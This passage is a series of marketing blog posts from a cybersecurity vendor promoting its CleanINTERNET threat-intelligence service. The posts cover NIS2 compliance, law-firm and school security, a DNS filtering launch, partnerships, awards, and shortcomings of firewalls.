cybersecurity practices, resilience, and compliance with specified security requirements.Security in Systems Acquisition and Maintenance: Establish and implement processes and procedures for securing the acquisition, development, and maintenance of ICT services or products, including setting security requirements, managing updates, validating compliance, and conducting security testing throughout their lifecycleEffectiveness Assessment:Establish, implement, and apply policies and procedures to assess the effectiveness of cybersecurity risk-management measures, including monitoring, measurement, analysis, and evaluation based on risk assessments and past incidents.Basic Cyber Hygiene and Training:This includes awareness-raising programs on cybersecurity risks and basic cyber hygiene practices for all employees, alongside providing role-specific security training aligned with network and information security policies and procedures.Cryptography:This involves setting guidelines for cryptographic measures, protocols, key management, and practices to safeguard information integrity and confidentiality according to organizational risk assessments and asset classifications.Human Resource Security:Employees and relevant parties should understand and commit to cybersecurity responsibilities through policies covering cyber hygiene, role awareness, background checks, and procedures for employment changes and disciplinary actions.Access Control:Establishing and enforcing policies for controlling logical and physical access to network and information systems, ensuring proper authentication, managing access rights based on business needs and security requirements, and regularly reviewing and updating these measures to mitigate risks effectively.Asset Management:Relevant Entities should classify information and assets based on their sensitivity and criticality, establishing policies for their secure handling throughout their lifecycle, maintaining an accurate inventory, and implementing procedures for the return or deletion of assets upon termination of employment.Environmental and Physical Security:Relevant entities should ensure the security and resilience of network and information systems against physical and environmental threats by protecting supporting utilities, implementing protective measures, and controlling physical access to sensitive areas. Significant Incidents CriteriaWhile the NIS2 Directive does not explicitly state what constitutes a significant incident, the draft implementing regulation outlines the criteria for determining a ‘significant incident’ that all relevant entities must follow. Incidents are deemed significant if they meet either the general or specific criteria. The general criteria include financial loss exceeding €100,000 or 5% of annual turnover, reputational damage reported in the media or impacting regulatory compliance, theft of trade secrets, death or considerable damage to health, unauthorized access, and recurring incidents. Specific criteria vary by provider. For instance, DNS Service Providers face criteria such as service unavailability for over 10 minutes or response times exceeding 10 seconds for more than an hour, while Managed Service Providers and Managed Security Service Providers are evaluated based on service unavailability, SLA breaches, and data compromise affecting over 5% of users.Your feedback through the 'Have Your Say' portal will play a crucial role in shaping the final regulation, ensuring it meets the diverse needs and challenges of digital service providers across the EU. Visit the Have Your Say portal to contribute your insights and help shape the future of cybersecurity regulations in Europe. HOW CAN CENTRIPETAL HELPRelevant entities subject to NIS2 should begin to perform risk analysis and assess their security posture. To help prepare, Centripetal can provide real-time automated shielding and monitoring, proactively protecting your organization from all known cyber threats, in real-time with CleanINTERNET®. --- ### [The Future of Legal Cybersecurity: Proactive, Intelligence-Driven, and Unmatched](https://www.centripetal.ai/blog/the-future-of-legal-cybersecurity-proactive-intelligence-driven-and-unmatched) Published: 2024-07-16 Summary: Safeguard sensitive client data with CleanINTERNET®: proactive, intelligent defense for unmatched speed and resilience. As a crucial member of your law firm’s IT team, you hold the responsibility of safeguarding highly sensitive client information - financial records, personal data, and privileged communications. While you might not be managing cases, you’re protecting the very foundation of client trust. However, this trust faces significant risk. Last year alone, 29% of law firms experienced a security breach, with the average cost per breach soaring to $4.47 million. As a bastion of confidentiality, the legal sector is now a prime target for cybercriminals. Why? The sensitivity of client data makes criminals believe that ransom demands are more likely to be paid.The Invisible Enemy: Evolving Cyber ThreatsThe cyber threat landscape is in constant flux, with adversaries continually evolving their tactics. For law firms, the stakes are extraordinarily high. Cybercriminals aren’t just after financial gain - they aim to exploit the treasure trove of sensitive information held by legal practices. The ramifications of a breach extend far beyond financial loss—they strike at the heart of client trust, and the firm’s reputation. Traditional cybersecurity methods, though offering some protection, are increasingly inadequate. Cyber criminals are moving faster, taking less than 24 hours to go from gaining access to exfiltration or infection. Commonly used reactive approaches trigger a response only after an attack has occurred, resulting in persistent challenges such as:Delayed Threat Detection:By the time a threat is identified, the damage is already done, causing significant financial and reputational harm.Static Defense Mechanisms:Traditional defenses lack the agility to respond to new, sophisticated threats, leaving critical gaps.Resource Constraints:Many law firms lack the in-house bandwidth and expertise needed to effectively and efficiently combat cyber threats.But what if it didn’t have to be this way anymore?Shifting the Paradigm: INTELLIGENCE-POWERED CybersecurityEnter intelligence-powered cybersecurity - a proactive, dynamic approach designed to stay ahead of cyber threats. This approach harnesses high-fidelity threat intelligence from a variety of sources to offer preemptive protection, neutralizing threats before they are even identified. This approach is designed to eliminate threats before they strike, ensuring robust protection and resilience.Proactive Defense:Deploy a security solution that adapts in real-time. Intelligence-powered cybersecurity provides legal practices with unparalleled, proactive protection against the latest cyberthreats.Unmatched Speed:Experience the fastest packet filtering technology on the planet. Patented defense technologies offer robust, scalable security, tailored to your firm’s needs.Ultimate Protection:Stay ahead of threats with intelligence operationalized from more than 240 of the world’s top providers, delivering comprehensive protection with the most current, real-time threat intelligence.Resource Optimization:Close the skills gap and lighten the load on your IT team. Expert intelligence operations analysts, augmented by AI, monitor and analyze threats, maximizing efficiency and reducing costs. Elevate your firm's security posture with cutting-edge, intelligence-powered cybersecurity. Consider the real-world benefits of implementing an intelligence-powered cybersecurity solution. Law firms with adaptive security frameworks report a 25% reduction in damaging cyber attacks. This isn’t just about numbers - it’s about maintaining your clients' trust and your firm's reputation.Transform Your Law Firm's Cybersecurity Strategy1. Operationalize and Integrate Threat Intelligence:Static defenses are relics of the past. Implement solutions that operationalize real-time threat intelligence from diverse sources to shield against threats before you even know their names.2. Adaptive and Proactive Security Framework:Transition to a dynamic, adaptive cybersecurity framework that leverages real-time threat intelligence to continuously monitor and update security measures, significantly enhancing breach mitigation.3. Embrace Innovative Technologies Over Legacy Systems:Create a proactive cybersecurity culture and shift away from relying on fragile and costly older technologies. Instead, invest in innovative, cutting-edge tools that provide more effective and efficient cybersecurity solutions. This forward-thinking approach not only enhances the firm's defenses but also optimizes cost-efficiency and adaptability in the face of evolving cyber threats.4. Integrate Cybersecurity into Business Strategy:Cybersecurity isn’t just an IT issue; it’s a business imperative. Integrate robust, intelligence-powered security measures into your firm’s core strategy, aligning cybersecurity goals with business objectives. Embedding intelligence-driven cybersecurity into your business strategy helps avoid significant data breaches and maintain client trust. By adopting these bold, intelligence-powered strategies, your law firm can transform its cybersecurity stance from outdated and reactive to proactive, innovative, and intelligence-driven, ensuring a formidable defense against the ever-evolving landscape of cyber threats.The Future of Legal CybersecurityThe cybersecurity landscape is evolving, and so must your defense strategies. Intelligence-powered cybersecurity represents the future - an approach that is proactive, dynamic, and adaptive. By leveraging real-time intelligence, law firms can stay one step ahead of cybercriminals, protecting their clients and preserving their reputations. At Centripetal, we understand the unique challenges faced by law firms. Our solution provides cyber protection today for leading legal firms in Europe and North America, delivering increased security, enhanced resilience, and unique insights into threat actors. CleanINTERNET® offers a distinctive, intelligence-powered approach with protection policies tailored to your specific industry. It’s time to move beyond traditional security measures and embrace a proactive defense strategy. Learn more. --- ### [Understanding the NIS2 Directive: Who is Affected and What You Need to Know](https://www.centripetal.ai/blog/understanding-the-nis2-directive-who-is-affected-and-what-you-need-to-know) Published: 2024-07-10 Summary: The upcoming NIS2 Directive significantly expands its scope to include a wide array of sectors and entities within the EU, imposing rigorous cybersecurity compliance measures with severe consequences… Time is of the essence, as the transposition deadline for the NIS2 Directive approaches on October 17, 2024, organizations across the EU must brace for its significant impact. This new Directive, updating and expanding its predecessor (NIS1), will dramatically increase the number of regulated entities. According to Ireland's National Cyber Security Centre, the number of regulated entities is expected to rise from about 120 under NIS1 to an estimated 3,500 under NIS2.   Who Does the NIS2 Directive Apply To? Sectors: The NIS2 Directive expands the range of sectors required to comply. While NIS1 included critical sectors like Transport, Banking, Financial Markets, Drinking Water, Digital Infrastructure, Energy, and Health, the new Directive extends its reach to additional areas: Postal and Courier Services Manufacture of Certain Critical Products Waste Water and Waste Management Public Administration Space Research Digital Services Food Production, Processing, and Distribution Providers of Public Electronic Communications Networks or Services Manufacture, Production, and Distribution of Chemicals Digital Service Providers Size: The Directive applies to all medium and large entities within these sectors. Here's a quick rundown of the size criteria: Large Enterprises: Annual revenue of €50 million and 250+ employees. Medium Enterprises: Annual revenue of €10 million and 50+ employees.   Entities are categorized as either "essential" or "important," ensuring broad coverage of the economy, particularly sectors vital to societal and economic activities. Notably, the Directive also includes small and micro enterprises if their services are critical to society, the economy, or specific sectors. Key Criteria for Inclusion To determine whether your organization falls under the NIS2 Directive, consider the following: Sector Relevance: Does your company operate within any of the sectors listed above? Size Requirements: Does your company meet the size thresholds for medium or large enterprises? Specific Criteria for Critical Entities: Beyond general sector and size applicability, certain entities are included due to their critical role or potential impact on society and the economy. These include: Providers of public electronic communications networks or services Trust service providers Top-level domain name registries and domain name system service providers Entities whose service disruption could significantly impact public safety, security, health, or induce systemic risk Sole providers of essential services in a Member State Public administration entities, especially those critical at the central or regional level   Who Will Be Held Responsible? Under the NIS2 Directive, essential entities face rigorous enforcement measures for non-compliance, including the temporary suspension of certifications or authorizations and the temporary prohibition of managerial functions at the CEO or legal representative level. These actions, proportional to the severity of the infringement, aim to enforce strong cybersecurity practices. Such measures can disrupt operations, affect financial stability, and harm reputations, highlighting the critical need for high compliance standards. A key change introduced by NIS2 is the requirement for "management bodies" of essential and important entities to approve and oversee the implementation of cybersecurity risk-management measures. These management bodies, including individuals with managerial responsibilities at the CEO or legal representative level, can be held liable for any breaches of NIS2 provisions. This responsibility underscores the pivotal role of top management in ensuring compliance and illustrates the significant consequences of failing to meet the Directive’s requirements.   Steps to Determine Your Organization's Status Assess Sector Involvement: Review the expanded list of sectors in the NIS2 Directive to see if your organization falls within any of these categories. Evaluate Size Criteria: Check if your organization meets the financial and employee size thresholds for medium or large enterprises. Identify Critical Role: Determine if your organization provides essential services, particularly those that could impact public safety, security, or health if disrupted. The NIS2 Directive's broad scope and stringent requirements mean that many more entities will now fall under its jurisdiction. Ensuring compliance involves not just understanding if your organization fits the sector and size criteria but also recognizing the critical nature of the services you provide. Preparing for NIS2 will help safeguard your organization against cyber threats and contribute to the overall security and resilience of the EU’s critical infrastructure and essential services.   Take Action Now With only four months left until the Directive's transposition deadline, it's crucial to begin your compliance preparations immediately. Identify whether your organization is impacted, understand the specific requirements, and implement necessary changes to ensure adherence to the NIS2 Directive. Stay tuned for more detailed guidance on the implementation of cybersecurity risk management measures and incident reporting obligations for aligning with the NIS2 Directive. --- ### [Guarding the Classroom: Shielding Students from TikTok with Intelligence Powered Cybersecurity](https://www.centripetal.ai/blog/shielding-students-from-tiktok-with-intelligence-powered-cybersecurity) Published: 2024-06-21 Summary: As TikTok continues to infiltrate classrooms, K-12 schools must urgently adopt intelligence powered cybersecurity strategies to shield their students from escalating digital dangers. The explosive growth of TikTok in schools isn’t just a trend—it’s a cybersecurity ticking time bomb. From rampant exposure to harmful content to severe data privacy concerns, TikTok’s unchecked influence poses significant threats to the safety and well-being of students, as well as compromising the technical infrastructure and sensitive data of schools. As the social media giant continues to infiltrate classrooms, K-12 schools must urgently adopt intelligence powered cybersecurity strategies to shield their students from the escalating digital dangers. How can intelligence powered cybersecurity counter TikTok’s hidden perils and protect  educational institutions?Understanding the Cybersecurity Challenges and Risks Posed by TikTokTikTok's pervasive influence on teenagers is undeniable. With over 1.5 billion users globally and a significant proportion of U.S. teens engaging with the platform daily, TikTok has become an integral part of teenage life. According to a 2023 Pew Research Center study, 63% of U.S. teens aged 13-17 use TikTok regularly, and 58% are daily users. This level of usage underscores the platform's stronghold on youth culture. Unfiltered Exposure to Harmful ContentTikTok’s powerful content algorithm is designed to captivate and engage, but it also has a dark side. Within minutes of joining, young users can be exposed to inappropriate content ranging from explicit material to dangerous trends. According to a study by the Center for Countering Digital Hate, the app's algorithm can direct students to harmful content almost immediately, bypassing traditional content controls and filters. This unregulated flow of content can have serious implications for the mental and emotional well-being of students, exposing them to material that is often beyond their comprehension and maturity level. The platform’s addictive nature, driven by its For You page, means students are continuously fed a stream of content that can include explicit language, suggestive imagery, and dangerous challenges. This not only disrupts their learning environment but also exposes them to risks that are hard to manage without sophisticated content filtering systems.Severe Privacy and Data Security RisksThe data privacy practices of TikTok have been a focal point of concern, particularly within educational settings. The app’s ability to collect and store vast amounts of personal information—including location, browsing habits, and device details—presents a significant risk to student privacy. Investigations into TikTok’s data handling practices, such as those reported by The Guardian, highlight the potential for misuse of this data, which can be exploited for targeted advertising or, in the worst-case scenario, fall into the hands of malicious actors. For schools, the implications are profound. Sensitive student data being compromised can lead to a host of problems, from identity theft to more insidious forms of digital exploitation. Schools must implement robust data protection measures to safeguard student information and mitigate these risks.Influence on Student Behavior and SafetyTikTok’s viral challenges and trends often blur the lines between fun and danger. The platform's design can encourage participation in viral phenomena that sometimes lead to harmful or risky behaviors. For example, challenges involving dangerous stunts or inappropriate acts can spread rapidly, pressuring students to participate for social validation. According to a 2022 survey by the Pew Research Center, 43% of teens felt a lot or some pressure to post content that would receive many likes and comments on social media, a pressure that can extend to engaging in viral challenges. This behavioral influence can undermine school safety and disrupt the educational environment. Schools need to be proactive in addressing these behavioral risks by monitoring trends and educating students about the potential dangers.Strategic Solutions: Leveraging Intelligence Powered CybersecurityImplementing Advanced Web FilteringTo effectively manage TikTok’s risks, schools need advanced web filtering technologies. DNS filtering, for example, provides a dynamic way to block access to harmful content while allowing educational resources to remain accessible. Intelligence powered cybersecurity solutions offer proactive protection by constantly updating threat intelligence in real-time, ensuring that students are shielded from inappropriate material even as new threats emerge. Advanced web filtering works by analyzing and categorizing internet traffic, allowing schools to set parameters that restrict access to dangerous content. This approach goes beyond simple URL blocking, offering a nuanced way to manage online activity and protect students from harmful influences.Enhancing Network Control MeasuresEffective network control is critical for ensuring that students do not bypass school internet restrictions using mobile data or other external networks. Implementing technologies such as network traffic analysis and mobile device management can help enforce the use of monitored school networks. These measures ensure that all internet activity is subject to the school’s security protocols, reducing the risk of exposure to harmful content and enhancing overall network security. As noted by EdTech Magazine, effective management of mobile devices is crucial for maintaining a secure and controlled digital environment.Adopting Comprehensive Threat IntelligenceIntegrating comprehensive threat intelligence is essential for staying ahead of the evolving risks TikTok presents. Intelligence powered cybersecurity solutions provide schools with the ability to monitor and block access to TikTok’s infrastructure, dynamically. This proactive approach ensures that even as TikTok updates its algorithms and content delivery mechanisms, schools remain protected. By leveraging real-time threat intelligence, schools can actively detect and respond to emerging risks, maintaining a secure learning environment. Intelligence powered cybersecurity involves operationalizing threat intelligence from hundreds of sources to proactively identify and mitigate potential threats. This enables schools to implement security measures that are both current and comprehensive, protecting students from a wide range of digital dangers.A Proactive Cybersecurity SolutionOur intelligence powered cybersecurity solution, CleanINTERNET®, is designed to address the unique challenges posed by today’s sophisticated threat landscape including platforms like TikTok in educational settings. By integrating dynamic and comprehensively sourced threat intelligence, this solution offers a robust framework for protecting students and school’s networks from the diverse risks associated with TikTok.Dynamic Threat Feeds and Real-Time UpdatesCleanINTERNET® aggregates real-time indicators of compromise, including IP addresses and domains linked to TikTok’s infrastructure. These dynamic threat feeds are continuously updated, allowing schools to filter out harmful content and block access to dangerous domains effectively. This adaptive and proactive solution ensures that schools can stay ahead of new threats, providing continuous protection for students.Hundreds of Intelligence SourcesUnlike traditional cybersecurity measures that rely on static rules, CleanINTERNET® operationalizes the world’s largest collection of threat intelligence in real-time. This comprehensive approach ensures that schools are prepared to handle a broad spectrum of threats, from content-related risks to data security issues. By integrating data from multiple sources, CleanINTERNET® provides a more complete and adaptable security framework.Ease of Integration and ScalabilityOur solutions are designed to integrate seamlessly with existing school IT infrastructures, offering scalable and efficient ways to manage TikTok access. This ease of integration means that schools can enhance their cybersecurity measures without significant disruptions or extensive manual updates.Embracing Intelligence Powered Cybersecurity for Modern ChallengesIn the face of TikTok’s growing influence and associated risks, K-12 schools must adopt innovative and proactive cybersecurity strategies. Intelligence powered solutions offer a proactive approach to managing these challenges, providing robust defenses against inappropriate content, data privacy concerns, and behavioral influences. By leveraging advanced web filtering, network control measures, and comprehensive threat intelligence, schools can protect their students while fostering a safe and secure educational environment. For more information on how your school can manage TikTok risks and enhance cybersecurity, contact us.     --- ### [Centripetal’s Global Partner Program Continues to Grow Stronger](https://www.centripetal.ai/blog/centripetals-global-partner-program-continues-to-grow-stronger) Published: 2024-06-06 Summary: The Centripetal Partner Program is now offering opportunity listing to our valued channel partners - a significant milestone in our commitment to empowering our global partner network. When we launched our partner program last fall we made a promise to listen to our valued partners so that we can strengthen our forces together. As a result, we are thrilled to announce that we now offer opportunity listing to our valued channel partners. This is a significant milestone in our commitment to empowering our global partner network with the tools they need to further succeed. This new feature allows true collaboration whereby partners can not only share the deals they are working on but feel confident these opportunities are protected. With seamless integration to our CRM, this functionality is simply designed to help you close opportunities faster and more efficiently. With the portal and program evolving, here’s what our partners can continue to expect from us: One Global Partner ProgramOur commitment to the channel is stronger than ever. We're dedicated to building and nurturing relationships that drive mutual growth and success worldwide. Enhanced Partner PortalOur portal continues to evolve, providing more robust functionality and tools to streamline your experience and maximize your success. For example,  our dynamic resources library, launched last year allowing partners to not only access all the collaterals needed for enablement and campaigns but to truly cobrand within the platform. A Word from Our CRO"Working with our partners to deliver preemptive cybersecurity solutions is paramount to our mission. This new feature underscores our dedication to ensuring our partners have the best tools and support to succeed," said Geoff Craig, NA CRO.What's Next?Stay tuned! We're continuously developing new features and enhancements. Expect to see more innovative tools and resources that will further support your business growth and operational efficiency. Join us in this journey and let's achieve greater heights together! Learn more about how you can join our Global Partner Program. --- ### [DNS, Powered by Intelligence: The Centripetal Advantage](https://www.centripetal.ai/blog/dns-powered-by-intelligence) Published: 2024-05-30 Summary: For the first time, DNS will be powered by the most extensive collection of threat intelligence in the industry with CleanINTERNET® DNS. We are trusted by the world’s most iconic brands with protecting their valuable business assets. Being named The Official Cyber Network Provider of The Boston Red Sox and Fenway Park demonstrates the importance for companies to adopt intelligence powered cybersecurity. When you have millions in revenue on the line like the Red Sox, you can’t afford to ignore intelligence. The security paradigm that organizations operate under isn’t working. No time in history have organizations spent as much money as they're doing right now on cybersecurity. For the past 15 years virtually all major breaches had available threat intelligence. Yet, threat intelligence still to this day is not being leveraged effectively. That is why we work with a community of more than 240+ threat intelligence providers to give our customers the proactive protection they require.  Today, we are taking that rich intelligence and expanding our portfolio of products with CleanINTERNET® DNS. For the first time, DNS will be powered by the most extensive collection of threat intelligence in the industry. Unlike other DNS filtering products that rely solely on blocklists, CleanINTERNET® DNS leverages advanced threat intelligence from multiple providers to proactively prevent users from accessing malicious websites and harmful content. Key benefits include:Total DNS Protection: Mitigating the risk of malware and phishing attacks on valuable business assets while also shielding users from accessing malicious sites.Comprehensive DNS Request Oversight:  Interrogating both outbound DNS requests and inbound DNS responses for any malicious websites or IP addresses.Robust Cybersecurity Posture: Improving security awareness among users in an effort to help businesses further protect their valuable assets.Unparalleled Reporting: Centripetal’s team of Intelligence Operations Analysts provide reports on DNS activity to help identify questionable behavior and unusual traffic while also allowing companies to gain visibility into user interaction through DNS filter logs.Rapid Deployment: Implementation happens in just minutes by easily routing requests to Centripetal’s CleanINTERNET® DNS service.The choice is yours to make. With cyber threats evolving daily, so should your defenses. It’s crucial that you take control of your organization’s valuable assets and deploy groundbreaking solutions for unparalleled security - with peace of mind.  New malicious websites are emerging every minute of every day.  It is only with fast moving, comprehensive threat intelligence that you can hope to ensure your users remain secure and that they will not fall victim to the vast range of scams and social engineering based fraud. CleanINTERNET® DNS is a cost-effective solution for enterprises. It provides an industry-first capability by incorporating the world’s largest threat intelligence collection, safeguarding users by preventing access to malicious sources and protecting network and data integrity from threat actors. Enterprises can rest easy knowing that their users are protected and their network infrastructure is not vulnerable to DNS poisoning attacks and other malicious activity. With CleanINTERNET® DNS you’re not just getting a new defensive solution, you’re proactively taking action. Don’t be the next headline. With Centripetal the future is secure. Trial CleanINTERNET® DNS, today. --- ### [The Face of Cybersecurity Excellence: Jess Parnell Wins CISO of The Year](https://www.centripetal.ai/blog/jess-parnell-wins-ciso-of-the-year) Published: 2024-05-21 Summary: Jess Parnell of Centripetal, has been named the CISO of the Year in the 2024 Cybersecurity Excellence Awards. In the world of cybersecurity being proactive is a necessity. Cyber threats loom large, and only those who dare to innovate, lead, and push boundaries can truly make a difference. That's why it's no surprise that our very own Jess Parnell, has been named the CISO of the Year in the 2024 Cybersecurity Excellence Awards. In addition to Jess taking home this well deserved award, we also clinched two other wins: Most Innovative Cybersecurity Company and the award for Intelligence Powered Cybersecurity. It’s been a big week for us, coming on the heels of being named the winner of Next Gen Intelligence Powered Security by Global InfoSec Cyber Defense Magazine.  Jess Parnell is not your average CISO. With a career spanning multiple industries and roles, including serving as the Security Operations Center Manager for the Department of Health and Human Services, Jess brings a wealth of experience to the table. His tenure at Centripetal, which began in 2015, has been marked by a relentless pursuit of innovation and excellence in cybersecurity. Under his leadership, Centripetal has developed groundbreaking technologies, supported by more than 100 patents, that form the core of a new intelligence-powered cybersecurity strategy. When Jess found out about this award, here's what he had to say: “I am deeply honored and humbled to be named CISO of the year from the Cybersecurity Excellence Awards. This recognition is a testament to the hard work and dedication of the entire Centripetal team. I am incredibly proud of what we have achieved together, and I look forward to continuing to drive innovation and excellence in cybersecurity to protect our clients from evolving threats.” The 2024 Cybersecurity Excellence Awards recognize and celebrate companies, products, and professionals that demonstrate excellence, innovation, and leadership in information security. The award recipients have been selected based on the strength of their nomination as well as the popular vote by members of the Information Security Community. Jess Parnell's recognition as the CISO of the Year and our multiple awards are a testament to our unwavering commitment to excellence and innovation in cybersecurity. As cyber threats continue to evolve, it is clear that proactive and innovative approaches like those championed by Jess and the rest of the team are crucial in ensuring a secure digital future for our customers. --- ### [Leading the Charge in Intelligence Powered Cybersecurity](https://www.centripetal.ai/blog/leading-the-charge-in-intelligence-powered-cybersecurity) Published: 2024-05-06 Summary: Centripetal wins first-ever Next Gen Intelligence Powered Security award from Cyber Defense Magazine at the 2024 RSA Conference. In the fast-paced world of cybersecurity, staying ahead of threats is not just a goal—it's a necessity. We have once again proved this to be true by clinching the prestigious, first-ever Next Gen Intelligence Powered Security award from Cyber Defense Magazine (CDM) at the RSA Conference 2024 in San Francisco. This first-of-its kind award, marks a pioneering step into this new frontier of cybersecurity.  The days of relying on traditional approaches to threat intelligence are long gone. Today's cyber landscape demands a proactive solution, and intelligence-powered cybersecurity is leading the charge. Our approach revolves around continuous monitoring and analysis of all threat intelligence. This proactive stance is a game-changer, offering tangible value by preventing attacks before they even happen. Jonathan Rogers, our Chief Operating Officer, expressed his excitement about the win, emphasizing the critical need for a shift in cyber defense strategies. "The rise in cyberattacks highlights the shortcomings of traditional defenses," said Rogers. "Intelligence powered cybersecurity provides a proactive defense, using real-time threat intelligence to prevent attacks instead of just reacting to them. This marks a major shift in cyber defense, ensuring ongoing protection in the modern digital landscape." Our success is not a stroke of luck; it's the result of over 14 years of dedicated effort in developing groundbreaking technologies. With more than 100 patents to our name, we stand at the forefront of intelligence powered cybersecurity. Our CleanINTERNET® service leverages the world's largest collection of intelligence to preemptively protect organizations from emerging threats in real-time. The result? A secure network that is free of malicious traffic, fortified in cyber resilience, and ready to meet the challenges of the modern world head-on. Gary S. Miliefsky, Publisher of Cyber Defense Magazine, praised us for our forward-thinking approach. "Centripetal embodies three major features we judges look for in winners: understanding tomorrow’s threats today, providing a cost-effective solution, and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach," said Miliefsky. This win is not just a victory for the company—it's a triumph for the entire cybersecurity industry. As threats continue to evolve, intelligence powered cybersecurity will undoubtedly be at the forefront of the battle, and Centripetal will be leading the charge. Learn more about intelligence powered cybersecurity. --- ### [Centripetal and 4Data: A Powerful Union for Intelligence Powered Cybersecurity](https://www.centripetal.ai/blog/centripetal-and-4data-a-powerful-union-for-intelligence-powered-cybersecurity) Published: 2024-04-23 Summary: Centripetal and 4Data Solutions join forces to revolutionise cybersecurity in the UK, offering preemptive protection against threats. In the ever-evolving cybersecurity landscape, staying ahead of threats is not just a priority but a necessity. Today, we’re announcing a strategic partnership with 4Data Solutions, a renowned technology solutions provider. This alliance is poised to redefine cybersecurity solutions across the UK while elevating the standards of protection for businesses worldwide. At the heart of this partnership lies a shared commitment to excellence in cybersecurity. 4Data has long been recognised for its unparalleled expertise in delivering cutting-edge solutions to its clientele. Their track record of SIEM knowledge and safeguarding businesses against threats has earned them presence on frameworks and with clearance to work with some of the highest profiled organisations across the country. Together we are poised to take our capabilities to unprecedented heights. Ian Tinney, CEO of 4Data Solutions, highlighted, “The cybersecurity landscape is crowded with similar but different technologies, making it difficult for an organization to make the best choices. However, occasionally, a new technology emerges that offers a genuinely new perspective, and Centripetal is one such company.” With our innovative, patented CleanINTERNET® solution, we’re bringing our intelligence powered cybersecurity solution that leverages real-time threat intelligence to preemptively identify and neutralise all known threats before they reach the network. By combining our advanced technologies with 4Data's trusted advisory position and intimate infrastructure knowledge we are laying the foundation for a new era of preemptive cybersecurity. Tinney continues, “CleanINTERNET® from Centripetal provides the fastest packet filtering patented technology on the market to deliver robust security at scale. This means that small to medium sized companies with a limited budget, and making tough decisions about where to spend their cybersecurity budget can now shield all known threats at the perimeter and achieve unparalleled protection. Additionally, for larger companies facing the arduous tasks of vulnerability patch management, threat intelligence analysis, alert fatigue and the continuous race against cyber threat actors, CleanINTERNET® offers a substantial advantage.” Prevention is always better than cure. This partnership marks a significant milestone in the realm of cybersecurity across the UK. Together, we are poised to redefine industry standards and set new benchmarks for excellence. As businesses navigate an increasingly complex threat landscape, they can rest assured knowing that Centripetal and 4Data are at the forefront, delivering pre-emptive cybersecurity solutions that are unmatched in effectiveness and reliability. Learn more about partnering with Centripetal. --- ### [Are Firewalls Alone Equipped to Mitigate Against the Increasingly Sophisticated Cyberthreats?](https://www.centripetal.ai/blog/are-firewalls-alone-equipped-to-mitigate-against-the-increasingly-sophisticated-cyberthreats) Published: 2024-02-14 Summary: Discover why traditional firewalls fall short against advanced cyber threats and how Centripetal's intelligence-powered cybersecurity offers scalable, dynamic protection with real-time analytics. The sheer volume of data breaches continues to escalate at a phenomenal rate. Cyberattacks on all businesses, but particularly small to medium-sized businesses, are becoming more frequent, targeted, and complex. According to Accenture’s Cost of Cybercrime Study, 43% of cyberattacks are aimed at small businesses, but only 14% of those businesses are prepared to defend themselves.  Security teams and professionals are tasked with safeguarding organizations against a myriad of cyber threats - from ransomware attacks to sophisticated nation-state espionage campaigns. Cybercriminals have a stronghold in the battle against cybercrime, and despite organizations best efforts to defend against threats, they continue to rely on legacy and next generation firewalls, exacerbating cyber defense issues.   Firewalls alone are no longer fit for purpose. Their role is to inspect traffic using linear search capabilities where the engine relies on a static and constrained IP reputation list. Firewalls are not inherently dynamic, and legacy firewalls cannot scale because they are extremely limited in the number of rules they can deploy and the stateful assumptions they make on risk. In this high flux environment, firewalls cannot process substantial amounts of intelligence to maximize the shielding of known threats, nor can it triage the areas of threats. Moreover, advanced threats often use malware variants capable of disabling the firewall, allowing the threat actor to take full command of the network and access mission-critical data.  Why are Firewalls failing?   Lack of context / granularity   Firewalls lack the awareness needed to differentiate between legitimate and malicious traffic. With cybercriminals employing increasingly sophisticated tactics, such as polymorphic malware and advanced evasion techniques, simply blocking or allowing traffic based on static rules is no longer sufficient.  Encryption versus decryption  The widespread adoption of encryption protocols, such as HTTPS, has become a double-edged sword for cybersecurity. While encryption helps protect sensitive data in transit, it also provides cover for cybercriminals seeking to conceal their malicious activities.  Lack of threat intelligence  Effective cybersecurity relies on timely and relevant threat intelligence to identify and respond to emerging threats. Legacy firewalls often lack robust integration with threat intelligence feeds, hindering organizations' ability to leverage up-to-date information about known threats and indicators of compromise (IOCs) to enhance their security posture. Without real-time threat intelligence, organizations are left playing catch-up with cyber adversaries.  Complexity and lacking flexibility Legacy firewalls are notorious for their complexity and rigidity, making them difficult to manage and adapt to evolving threats and business requirements. Over time, configuration errors, misconfigurations, and outdated rule sets can accumulate, creating blind spots and vulnerabilities in the firewall defenses. Without continuous monitoring and maintenance, legacy firewalls become liabilities rather than assets in the fight against cyber threats.  This is where Centripetal’s intelligence powered cybersecurity comes in.  Differentiator  Firewall  Centripetal  Scalability  Limited amount on average of approximately 7-20,000 blunt, uni-directional rules.   Cannot keep pace with evolving IOCs.   Decreasing efficiency as ruleset grows.  Mass-scale ingestion of billions of unique IOCs applied bi-directionally with highly granular per rule element inspection.  Seamless updates without any disruption to the network.  Dynamics  Updating a conventional firewall requires a service window and a service outage.   Millions of IOC elements. change daily leaving a legacy firewall consistently out of date.  Patented live update technology enables continuous IOC updates without any drop-in traffic or gap in security inspection. Millions of updates processed daily, billions processed weekly.  Network Performance  High latency and packet dropping when approaching rule capacity, logging, using a multi-field rule, or performing any secondary inspection.    High performance software filters at scale with the highest decision rate in the industry.  Detailed primary and secondary inspection with full real time logging.  Micro-second latency at up to 100Gb/s line speeds.  Security  Performance  Deploys less than .01% of available CTI in operations leaving known TTP exposure of over 99%.  Stateful assumptions of trust.   Inability to triage CTI events inline places huge burden on the SIEM with mass event triggering. Clouds security operations.  Greatly increases the efficacy of the security stack by shielding against known malicious threats and TTPs with >90% coverage ratio.  Real time adaptive filtering of every single packet – always.  Dramatic decrease of events ingested to SIEM  Prioritizes advanced threat detection.  Analytics  & Operations  Performance  Inability to triage security operations on the basis of intelligence.  No real-time analytics.    Enhances security with >95% coverage against known threats.   Employs real time adaptive filtering for every packet, reducing known risks in SIEM.  Prioritizes advanced threat detection.  For more information contact sales@centripetal.ai or request a demo here . --- ### [Far Beyond the Firewall - Experiencing Alert Fatigue From Your Overwhelmed Firewall?](https://www.centripetal.ai/blog/far-beyond-the-firewall-experiencing-alert-fatigue-from-your-overwhelmed-firewall) Published: 2024-02-14 Summary: Overwhelmed firewalls contribute to alert fatigue amid increasing cyber threats. It advocates for a layered security approach, emphasizing intelligence-powered defense and highlighting Centripetal's… The cyberthreat landscape is ever-evolving and the level of sophistication from cybercriminals is always increasing. Networks are not impenetrable. Alarmingly, 79 minutes is now the average time from when an attacker compromises a network to when they start to move laterally, infiltrating the rest of the network. (1 CrowdStrike Report, 2023) Organizations are struggling to cope, and the firewall bears the brunt of expectations – not to mention the accountabilities – in defending the outer 